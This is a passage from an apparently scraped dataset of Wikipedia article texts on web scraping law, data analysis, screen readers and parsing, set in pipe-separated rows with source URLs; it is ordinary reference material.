AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
83 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_analysis | Data analysis is the process of inspecting, cleansing, transforming, and modeling data with the goal of discovering useful information, informing conclusions, and supporting decision-making. 1 Data analysis has multiple facets and approaches, encompassing diverse techniques under a variety of names, and is used in different business, science, and social science domains. 2 In today's business world, data analysis plays a role in making decisions more scientific and helping businesses operate more effectively. 3 Data mining is a particular data analysis technique that focuses on statistical modeling and knowledge discovery for predictive rather than purely descriptive purposes, while business intelligence covers data analysis that relies heavily on aggregation, focusing mainly on business information. 4 In statistical applications, data analysis can be divided into descriptive statistics, exploratory data analysis (EDA), and confirmatory data analysis (CDA). 5 EDA focuses on discovering new features in the data while CDA focuses on confirming or falsifying existing hypotheses. 6 7 Predictive analytics focuses on the application of statistical models for predictive forecasting or classification, while text analytics applies statistical, linguistic, and structural techniques to extract and classify information from textual sources, a species of unstructured data. All of the above are varieties of data analysis. 8 Data integration is a precursor to data analysis, and data analysis is closely linked to data visualization and data dissemination. 9 Analysis refers to dividing a whole into its separate components for individual examination. 10 Data analysis is a process for obtaining raw data, and subsequently converting it into information useful for decision-making by users. 1 Data is collected and analyzed to answer questions, test hypotheses, or disprove theories. 11 Statistician John Tukey, defined data analysis in 1961, as: "Procedures for analyzing data, techniques for interpreting the results of such procedures, ways of planning the gathering of data to make its analysis easier, more precise or more accurate, and all the machinery and results of (mathematical) statistics which apply to analyzing data. 12 There are several phases that can be distinguished, described below. The phases are iterative, in that feedback from later phases may result in additional work in earlier phases. 13 The CRISP framework, used in data mining, has similar steps. The data is necessary as inputs to the analysis, which is specified based upon the requirements of those directing the analytics (or customers, who will use the finished product of the analysis). 14 15 The general type of entity upon which the data will be collected is referred to as an experimental unit (e.g., a person or population of people). Specific variables regarding a population (e.g., age and income) may be specified and obtained. Data may be numerical or categorical (i.e., a text label for numbers). 13 Data is collected from a variety of sources. 16 17 A list of data sources are available for study research. The requirements may be communicated by analysts to custodians of the data; such as, Information Technology personnel within an organization. 18 Data collection or data gathering is the process of gathering and measuring information on targeted variables in an established system, which then enables one to answer relevant questions and evaluate outcomes. The data may also be collected from sensors in the environment, including traffic cameras, satellites, recording devices, etc. It may also be obtained through interviews, downloads from online sources, or reading documentation. 13 Data, when initially obtained, must be processed or organized for analysis. 19 20 For instance, these may involve placing data into rows and columns in a table format (known as structured data) for further analysis, often through the use of spreadsheet or statistical software. 13 Once processed and organized, the data may be incomplete, contain duplicates, or contain errors. 21 22 The need for data cleaning will arise from problems in the way that the datum are entered and stored. 21 Data cleaning is the process of preventing and correcting these errors. Common tasks include record matching, identifying inaccuracy of data, overall quality of existing data, deduplication, and column segmentation. 23 Such data problems can also be identified through a variety of analytical techniques. For example; with financial information, the totals for particular variables may be compared against separately published numbers that are believed to be reliable. 24 25 Unusual amounts, above or below predetermined thresholds, may also be reviewed. There are several types of data cleaning, that are dependent upon the type of data in the set; this could be phone numbers, email addresses, employers, or other values. 26 27 Quantitative data methods for outlier detection, can be used to get rid of data that appears to have a higher likelihood of being input incorrectly. 28 Textual data spell checkers can be used to lessen the amount of mistyped words. However, it is harder to tell if the words themselves are correct. 29 Once the datasets are cleaned, they can then be analyzed. Analysts may apply a variety of techniques, referred to as exploratory data analysis, to begin understanding the messages contained within the obtained data. 30 The process of data exploration may result in additional data cleaning or additional requests for data; thus, the initialization of the iterative phases mentioned in the lead paragraph of this section. 31 Descriptive statistics, such as, the average or median, can be generated to aid in understanding the data. 32 33 Data visualization is also a technique used, in which the analyst is able to examine the data in a graphical format in order to obtain additional insights, regarding the messages within the data. 13 Mathematical formulas or models (also known as algorithms), may be applied to the data in order to identify relationships among the variables; for example, using correlation or causation. 34 35 In general terms, models may be developed to evaluate a specific variable based on other variable(s) contained within the dataset, with some residual error depending on the implemented model's accuracy (e.g., Data Model Error). 36 11 Inferential statistics includes utilizing techniques that measure the relationships between particular variables. 37 For example, regression analysis may be used to model whether a change in advertising (independent variable X), provides an explanation for the variation in sales (dependent variable Y). 38 In mathematical terms, Y (sales) is a function of X (advertising). 39 It may be described as (Y aX b error), where the model is designed such that (a) and (b) minimize the error when the model predicts Y for a given range of values of X. 40 Analysts may also attempt to build models that are descriptive of the data, in an aim to simplify analysis and communicate results. 11 A data product is a computer application that takes data inputs and generates outputs, feeding them back into the environment. 41 It may be based on a model or algorithm. For instance, an application that analyzes data about customer purchase history, and uses the results to recommend other purchases the customer might enjoy. 42 13 Once data is analyzed, it may be reported in many formats to the users of the analysis to support their requirements. 44 The users may have feedback, which results in additional analysis. As such, much of the analytical cycle is iterative. 13 When determining how to communicate the results, the analyst may consider implementing a variety of data visualization techniques to help communicate the message more clearly and efficiently to the audience. 45 Data visualization uses information displays (graphics such as, tables and charts) to help communicate key messages contained in the data. 46 Tables are a valuable tool by enabling the ability of a user to query and focus on specific numbers; while charts (e.g., bar charts or line charts), may help explain the quantitative messages contained in the data. 47 Stephen Few described eight types of quantitative messages that users may attempt to understand or communicate from a set of data and the associated graphs used to help communicate the message. 48 Customers specifying requirements and analysts performing the data analysis may consider these messages during the course of the process. 49 Author Jonathan Koomey has recommended a series of best practices for understanding quantitative data. 60 These include: For the variables under examination, analysts typically obtain descriptive statistics for them, such as the mean (average), median, and standard deviation. 61 They may also analyze the distribution of the key variables to see how the individual values cluster around the mean. 62 The consultants at McKinsey and Company named a technique for breaking a quantitative problem down into its component parts called the MECE principle. 63 Each layer can be broken down into its components; each of the sub-components must be mutually exclusive of each other and collectively add up to the layer above them. 64 The relationship is referred to as "Mutually Exclusive and Collectively Exhaustive" or MECE. For example, profit by definition can be broken down into total revenue and total cost. 65 In turn, total revenue can be analyzed by its components, such as the revenue of divisions A, B, and C (which are mutually exclusive of each other) and should add to the total revenue (collectively exhaustive). 66 Analysts may use robust statistical measurements to solve certain analytical problems. 67 Hypothesis testing is used when a particular hypothesis about the true state of affairs is made by the analyst and data is gathered to determine whether that state of affairs is true or false. 68 69 For example, the hypothesis might be that "Unemployment has no effect on inflation", which relates to an economics concept called the Phillips Curve. 70 Hypothesis testing involves considering the likelihood of Type I and type II errors, which relate to whether the data supports accepting or rejecting the hypothesis. 71 72 Regression analysis may be used when the analyst is trying to determine the extent to which independent variable X affects dependent variable Y (e.g., "To what extent do changes in the unemployment rate (X) affect the inflation rate (Y)? ). 73 This is an attempt to model or fit an equation line or curve to the data, such that Y is a function of X. 74 75 Necessary condition analysis (NCA) may be used when the analyst is trying to determine the extent to which independent variable X allows variable Y (e.g., "To what extent is a certain unemployment rate (X) necessary for a certain inflation rate (Y)? ). 73 Whereas (multiple) regression analysis uses additive logic where each X-variable can produce the outcome and the X's can compensate for each other (they are sufficient but not necessary), 76 necessary condition analysis (NCA) uses necessity logic, where one or more X-variables allow the outcome to exist, but may not produce it (they are necessary but not sufficient). Each single necessary condition must be present and compensation is not possible. 77 Users may have particular data points of interest within a data set, as opposed to the general messaging outlined above. Such low-level user analytic activities are presented in the following table. The taxonomy can also be organized by three poles of activities: retrieving values, finding data points, and arranging data points. 78 79 80 81 - How long is the movie Gone with the Wind? - What comedies have won awards? - Which funds underperformed the SP 500? - What is the gross income of all stores combined? - How many manufacturers of cars are there? - What director film has won the most awards? - What Marvel Studios film has the most recent release date? - Rank the cereals by calories. - What is the range of car horsepowers? - What actresses are in the data set? - What is the age distribution of shoppers? - Are there any outliers in protein? - Is there a cluster of typical film lengths? - Is there a correlation between country of origin and MPG? - Do different genders have a preferred payment method? - Is there a trend of increasing film length over the years? Barriers to effective analysis may exist among the analysts performing the data analysis or among the audience. Distinguishing fact from opinion, cognitive biases, and innumeracy are all challenges to sound data analysis. 82 You are entitled to your own opinion, but you are not entitled to your own facts. Daniel Patrick Moynihan Effective analysis requires obtaining relevant facts to answer questions, support a conclusion or formal opinion, or test hypotheses. 83 84 Facts by definition are irrefutable, meaning that any person involved in the analysis should be able to agree upon them. 85 For example, in August 2010, the Congressional Budget Office (CBO) estimated that extending the Bush tax cuts of 2001 and 2003 for the 2011 2020 time period would add approximately $3.3 trillion to the national debt. 86 Everyone should be able to agree that indeed this is what CBO reported; they can all examine the report. This makes it a fact. Whether persons agree or disagree with the CBO is their own opinion. 87 As another example, the auditor of a public company must arrive at a formal opinion on whether financial statements of publicly traded corporations are "fairly stated, in all material respects". 88 This requires extensive analysis of factual data and evidence to support their opinion. When making the leap from facts to opinions, there is always the possibility that the opinion is erroneous. 89 There are a variety of cognitive biases that can adversely affect analysis. For example, confirmation bias is the tendency to search for or interpret information in a way that confirms one's preconceptions. 90 In addition, individuals may discredit information that does not support their views. 91 Analysts may be trained specifically to be aware of these biases and how to overcome them. 92 In his book Psychology of Intelligence Analysis, retired CIA analyst Richards Heuer wrote that analysts should clearly delineate their assumptions and chains of inference and specify the degree and source of the uncertainty involved in the conclusions. 93 He emphasized procedures to help surface and debate alternative points of view. 94 Effective analysts are generally adept with a variety of numerical techniques. However, audiences may not have such literacy with numbers or numeracy; they are said to be innumerate. 95 Persons communicating the data may also be attempting to mislead or misinform, deliberately using bad numerical techniques. 96 For example, whether a number is rising or falling may not be the key factor. More important may be the number relative to another number, such as the size of government revenue or spending relative to the size of the economy (GDP) or the amount of cost relative to revenue in corporate financial statements. 97 This numerical technique is referred to as normalization 25 or common-sizing. There are many such techniques employed by analysts, whether adjusting for inflation (i.e., comparing real vs. nominal data) or considering population increases, demographics, etc. 98 Analysts apply a variety of techniques to address the various quantitative messages described in the section above. 99 Analysts may also analyze data under different assumptions or scenario. For example, when analysts perform financial statement analysis, they will often recast the financial statements under different assumptions to help arrive at an estimate of future cash flow, which they then discount to present value based on some interest rate, to determine the valuation of the company or its stock. 100 101 Similarly, the CBO analyzes the effects of various policy options on the government's revenue, outlays and deficits, creating alternative future scenarios for key measures. 102 A data analytics approach can be used in order to predict energy consumption in buildings. 103 The different steps of the data analysis process are carried out in order to realise smart buildings, where the building management and control operations including heating, ventilation, air conditioning, lighting and security are realised automatically by miming the needs of the building users and optimising resources like energy and time. 104 Analytics is the "extensive use of data, statistical and quantitative analysis, explanatory and predictive models, and fact-based management to drive decisions and actions. It is a subset of business intelligence, which is a set of technologies and processes that uses data to understand and analyze business performance to drive decision-making . 105 In education, most educators have access to a data system for the purpose of analyzing student data. 106 These data systems present data to educators in an over-the-counter data format (embedding labels, supplemental documentation, and a help system and making key package display and content decisions) to improve the accuracy of educators’ data analyses. 107 This section contains rather technical explanations that may assist practitioners but are beyond the typical scope of a Wikipedia article. 108 The most important distinction between the initial data analysis phase and the main analysis phase, is that during initial data analysis one refrains from any analysis that is aimed at answering the original research question. 109 The initial data analysis phase is guided by the following four questions: 110 The quality of the data should be checked as early as possible. Data quality can be assessed in several ways, using different types of analysis: frequency counts, descriptive statistics (mean, standard deviation, median), normality (skewness, kurtosis, frequency histograms), normal imputation is needed. 111 The choice of analyses to assess the data quality during the initial data analysis phase depends on the analyses that will be conducted in the main analysis phase. 114 The quality of the measurement instruments should only be checked during the initial data analysis phase when this is not the focus or research question of the study. 115 116 One should check whether structure of measurement instruments corresponds to structure reported in the literature. There are two ways to assess measurement quality: After assessing the quality of the data and of the measurements, one might decide to impute missing data, or to perform initial transformations of one or more variables, although this can also be done during the main analysis phase. 119 Possible transformations of variables are: 120 One should check the success of the randomization procedure, for instance by checking whether background and substantive variables are equally distributed within and across groups. 121 If the study did not need or use a randomization procedure, one should check the success of the non-random sampling, for instance by checking whether all subgroups of the population of interest are represented in sample. 122 Other possible data distortions that should be checked are: In any report or article, the structure of the sample must be accurately described. 124 125 It is especially important to exactly determine the structure of the sample (and specifically the size of the subgroups) when subgroup analyses will be performed during the main analysis phase. 126 The characteristics of the data sample can be assessed by looking at: During the final stage, the findings of the initial data analysis are documented, and necessary, preferable, and possible corrective actions are taken. 128 Also, the original plan for the main data analyses can and should be specified in more detail or rewritten. 129 In order to do this, several decisions about the main data analyses can and should be made: Several analyses can be used during the initial data analysis phase: 131 It is important to take the measurement levels of the variables into account for the analyses, as special statistical techniques are available for each level: 132 Nonlinear analysis is often necessary when the data is recorded from a nonlinear system. Nonlinear systems can exhibit complex dynamic effects including bifurcations, chaos, harmonics and subharmonics that cannot be analyzed using simple linear methods. Nonlinear data analysis is closely related to nonlinear system identification. 133 In the main analysis phase, analyses aimed at answering the research question are performed as well as any other relevant analysis needed to write the first draft of the research report. 134 In the main analysis phase, either an exploratory or confirmatory approach can be adopted. Usually the approach is decided before data is collected. 135 In an exploratory analysis no clear hypothesis is stated before analysing the data, and the data is searched for models that describe the data well. 136 In a confirmatory analysis clear hypotheses about the data are tested. 137 Exploratory data analysis should be interpreted carefully. When testing multiple models at once there is a high chance on finding at least one of them to be significant, but this can be due to a type 1 error. 138 It is important to always adjust the significance level when testing multiple models with, for example, a Bonferroni correction. 139 Also, one should not follow up an exploratory analysis with a confirmatory analysis in the same dataset. 140 An exploratory analysis is used to find ideas for a theory, but not to test that theory as well. 140 When a model is found exploratory in a dataset, then following up that analysis with a confirmatory analysis in the same dataset could simply mean that the results of the confirmatory analysis are due to the same type 1 error that resulted in the exploratory model in the first place. 140 The confirmatory analysis therefore will not be more informative than the original exploratory analysis. 141 It is important to obtain some indication about how generalizable the results are. 142 While this is often difficult to check, one can look at the stability of the results. Are the results reliable and reproducible? There are two main ways of doing that. 143 Notable free software for data analysis include: The typical data analysis workflow involves collecting data, running analyses through various scripts, creating visualizations, and writing reports. However, this workflow presents challenges, including a separation between analysis scripts and data, as well as a gap between analysis and documentation. Often, the correct order of running scripts is only described informally or resides in the data scientist's memory. The potential for losing this information creates issues for reproducibility. To address these challenges, it is essential to have analysis scripts written for automated, reproducible workflows. Additionally, dynamic documentation is crucial, providing reports that are understandable by both machines and humans, ensuring accurate representation of the analysis workflow even as scripts evolve. 150 Different companies or organizations hold data analysis contests to encourage researchers to utilize their data or to solve a particular question using data analysis. 151 152 A few examples of well-known international data analysis contests are as follows: 153 |
84 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Screen_reader | A screen reader is a form of assistive technology (AT) 1 that renders text and image content as speech or braille output. Screen readers are essential to people who are blind, 2 and are useful to people who are visually impaired, 2 illiterate, or have a learning disability. 3 Screen readers are software applications that attempt to convey what people with normal eyesight see on a display to their users via non-visual means, like text-to-speech, 4 sound icons, 5 or a braille device. 2 They do this by applying a wide variety of techniques that include, for example, interacting with dedicated accessibility APIs, using various operating system features (like inter-process communication and querying user interface properties), and employing hooking techniques. 6 Microsoft Windows operating systems have included the Microsoft Narrator screen reader since Windows 2000, though separate products such as Freedom Scientific's commercially available JAWS screen reader and ZoomText screen magnifier and the free and open source screen reader NVDA by NV Access are more popular for that operating system. 7 Apple Inc.'s macOS, iOS, and tvOS include VoiceOver as a built-in screen reader, while Google's Android provides the Talkback screen reader and its ChromeOS can use ChromeVox. 8 Similarly, Android-based devices from Amazon provide the VoiceView screen reader. There are also free and open source screen readers for Linux and Unix-like systems, such as Speakup and Orca. In early operating systems, such as MS-DOS, which employed command-line interfaces (CLIs), the screen display consisted of characters mapping directly to a screen buffer in memory and a cursor position. Input was by keyboard. All this information could therefore be obtained from the system either by hooking the flow of information around the system and reading the screen buffer or by using a standard hardware output socket 9 and communicating the results to the user. In the 1980s, the Research Centre for the Education of the Visually Handicapped (RCEVH) at the University of Birmingham developed a Screen Reader for the BBC Micro and NEC Portable. 10 11 With the arrival of graphical user interfaces (GUIs), the situation became more complicated. A GUI has characters and graphics drawn on the screen at particular positions, and therefore there is no purely textual representation of the graphical contents of the display. Screen readers were therefore forced to employ new low-level techniques, gathering messages from the operating system and using these to build up an "off-screen model", a representation of the display in which the required text content is stored. 12 For example, the operating system might send messages to draw a command button and its caption. These messages are intercepted and used to construct the off-screen model. The user can switch between controls (such as buttons) available on the screen and the captions and control contents will be read aloud and or shown on a refreshable braille display. Screen readers can also communicate information on menus, controls, and other visual constructs to permit blind users to interact with these constructs. However, maintaining an off-screen model is a significant technical challenge; hooking the low-level messages and maintaining an accurate model are both difficult tasks. citation needed Operating system and application designers have attempted to address these problems by providing ways for screen readers to access the display contents without having to maintain an off-screen model. These involve the provision of alternative and accessible representations of what is being displayed on the screen accessed through an API. Existing APIs include: Screen readers can query the operating system or application for what is currently being displayed and receive updates when the display changes. For example, a screen reader can be told that the current focus is on a button and the button caption to be communicated to the user. This approach is considerably easier for the developers of screen readers, but fails when applications do not comply with the accessibility API: for example, Microsoft Word does not comply with the MSAA API, so screen readers must still maintain an off-screen model for Word or find another way to access its contents. citation needed One approach is to use available operating system messages and application object models to supplement accessibility APIs. Screen readers can be assumed to be able to access all display content that is not intrinsically inaccessible. Web browsers, word processors, icons and windows and email programs are just some of the applications used successfully by screen reader users. However, according to some users, who? using a screen reader is considerably more difficult than using a GUI, and many applications have specific problems resulting from the nature of the application (e.g. animations) or failure to comply with accessibility standards for the platform (e.g. Microsoft Word and Active Accessibility). citation needed Some programs and applications have voicing technology built in alongside their primary functionality. These programs are termed self-voicing and can be a form of assistive technology if they are designed to remove the need to use a screen reader. citation needed Some telephone services allow users to interact with the internet remotely. For example, TeleTender can read web pages over the phone and does not require special programs or devices on the user side. citation needed Virtual assistants can sometimes read out written documents (textual web content, PDF documents, e-mails etc.) The best-known examples are Apple's Siri, Google Assistant, and Amazon Alexa. A relatively new development in the field is web-based applications like Spoken-Web that act as web portals, managing content like news updates, weather, science and business articles for visually-impaired or blind computer users. citation needed Other examples are ReadSpeaker or BrowseAloud that add text-to-speech functionality to web content. citation needed The primary audience for such applications is those who have difficulty reading because of learning disabilities or language barriers. citation needed Although functionality remains limited compared to equivalent desktop applications, the major benefit is to increase the accessibility of said websites when viewed on public machines where users do not have permission to install custom software, giving people greater "freedom to roam". citation needed This functionality depends on the quality of the software but also on a logical structure of the text. Use of headings, punctuation, presence of alternate attributes for images, etc. is crucial for a good vocalization. Also a web site may have a nice look because of the use of appropriate two dimensional positioning with CSS but its standard linearization, for example, by suppressing any CSS and Javascript in the browser may not be comprehensible. citation needed Most screen readers allow the user to select whether most punctuation is announced or silently ignored. Some screen readers can be tailored to a particular application through scripting. One advantage of scripting is that it allows customizations to be shared among users, increasing accessibility for all. JAWS enjoys an active script-sharing community, for example. citation needed Verbosity is a feature of screen reading software that supports vision-impaired computer users. Speech verbosity controls enable users to choose how much speech feedback they wish to hear. Specifically, verbosity settings allow users to construct a mental model of web pages displayed on their computer screen. Based on verbosity settings, a screen-reading program informs users of certain formatting changes, such as when a frame or table begins and ends, where graphics have been inserted into the text, or when a list appears in the document. The verbosity settings can also control the level of descriptiveness of elements, such as lists, tables, and regions. 16 For example, JAWS provides low, medium, and high web verbosity preset levels. The high web verbosity level provides more detail about the contents of a webpage. 17 Some screen readers can read text in more than one language, provided that the language of the material is encoded in its metadata. 18 Screen reading programs like JAWS, NVDA, and VoiceOver also include language verbosity, which automatically detects verbosity settings related to speech output language. For example, if a user navigated to a website based in the United Kingdom, the text would be read with an English accent. citation needed |
85 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Parsing | Parsing, syntax analysis, or syntactic analysis is the process of analyzing a string of symbols, either in natural language, computer languages or data structures, conforming to the rules of a formal grammar. The term parsing comes from Latin pars (orationis), meaning part (of speech). 1 The term has slightly different meanings in different branches of linguistics and computer science. Traditional sentence parsing is often performed as a method of understanding the exact meaning of a sentence or word, sometimes with the aid of devices such as sentence diagrams. It usually emphasizes the importance of grammatical divisions such as subject and predicate. Within computational linguistics the term is used to refer to the formal analysis by a computer of a sentence or other string of words into its constituents, resulting in a parse tree showing their syntactic relation to each other, which may also contain semantic information. citation needed Some parsing algorithms generate a parse forest or list of parse trees from a string that is syntactically ambiguous. 2 The term is also used in psycholinguistics when describing language comprehension. In this context, parsing refers to the way that human beings analyze a sentence or phrase (in spoken language or text) "in terms of grammatical constituents, identifying the parts of speech, syntactic relations, etc. 1 This term is especially common when discussing which linguistic cues help speakers interpret garden-path sentences. Within computer science, the term is used in the analysis of computer languages, referring to the syntactic analysis of the input code into its component parts in order to facilitate the writing of compilers and interpreters. The term may also be used to describe a split or separation. The traditional grammatical exercise of parsing, sometimes known as clause analysis, involves breaking down a text into its component parts of speech with an explanation of the form, function, and syntactic relationship of each part. 3 This is determined in large part from study of the language's conjugations and declensions, which can be quite intricate for heavily inflected languages. To parse a phrase such as "man bites dog" involves noting that the singular noun "man" is the subject of the sentence, the verb "bites" is the third person singular of the present tense of the verb "to bite", and the singular noun "dog" is the object of the sentence. Techniques such as sentence diagrams are sometimes used to indicate relation between elements in the sentence. Parsing was formerly central to the teaching of grammar throughout the English-speaking world, and widely regarded as basic to the use and understanding of written language. However, the general teaching of such techniques is no longer current. citation needed In some machine translation and natural language processing systems, written texts in human languages are parsed by computer programs. 4 Human sentences are not easily parsed by programs, as there is substantial ambiguity in the structure of human language, whose usage is to convey meaning (or semantics) amongst a potentially unlimited range of possibilities, but only some of which are germane to the particular case. 5 So an utterance "Man bites dog" versus "Dog bites man" is definite on one detail but in another language might appear as "Man dog bites" with a reliance on the larger context to distinguish between those two possibilities, if indeed that difference was of concern. It is difficult to prepare formal rules to describe informal behaviour even though it is clear that some rules are being followed. citation needed In order to parse natural language data, researchers must first agree on the grammar to be used. The choice of syntax is affected by both linguistic and computational concerns; for instance some parsing systems use lexical functional grammar, but in general, parsing for grammars of this type is known to be NP-complete. Head-driven phrase structure grammar is another linguistic formalism which has been popular in the parsing community, but other research efforts have focused on less complex formalisms such as the one used in the Penn Treebank. Shallow parsing aims to find only the boundaries of major constituents such as noun phrases. Another popular strategy for avoiding linguistic controversy is dependency grammar parsing. Most modern parsers are at least partly statistical; that is, they rely on a corpus of training data which has already been annotated (parsed by hand). This approach allows the system to gather information about the frequency with which various constructions occur in specific contexts. (See machine learning.) Approaches which have been used include straightforward PCFGs (probabilistic context-free grammars), 6 maximum entropy, 7 and neural nets. 8 Most of the more successful systems use lexical statistics (that is, they consider the identities of the words involved, as well as their part of speech). However such systems are vulnerable to overfitting and require some kind of smoothing to be effective. citation needed Parsing algorithms for natural language cannot rely on the grammar having 'nice' properties as with manually designed grammars for programming languages. As mentioned earlier some grammar formalisms are very difficult to parse computationally; in general, even if the desired structure is not context-free, some kind of context-free approximation to the grammar is used to perform a first pass. Algorithms which use context-free grammars often rely on some variant of the CYK algorithm, usually with some heuristic to prune away unlikely analyses to save time. (See chart parsing.) However some systems trade speed for accuracy using, e.g., linear-time versions of the shift-reduce algorithm. A somewhat recent development has been parse reranking in which the parser proposes some large number of analyses, and a more complex system selects the best option. citation needed In natural language understanding applications, semantic parsers convert the text into a representation of its meaning. 9 In psycholinguistics, parsing involves not just the assignment of words to categories (formation of ontological insights), but the evaluation of the meaning of a sentence according to the rules of syntax drawn by inferences made from each word in the sentence (known as connotation). This normally occurs as words are being heard or read. Neurolinguistics generally understands parsing to be a function of working memory, meaning that parsing is used to keep several parts of one sentence at play in the mind at one time, all readily accessible to be analyzed as needed. Because the human working memory has limitations, so does the function of sentence parsing. 10 This is evidenced by several different types of syntactically complex sentences that propose potentially issues for mental parsing of sentences. The first, and perhaps most well-known, type of sentence that challenges parsing ability is the garden-path sentence. These sentences are designed so that the most common interpretation of the sentence appears grammatically faulty, but upon further inspection, these sentences are grammatically sound. Garden-path sentences are difficult to parse because they contain a phrase or a word with more than one meaning, often their most typical meaning being a different part of speech. 11 For example, in the sentence, "the horse raced past the barn fell", raced is initially interpreted as a past tense 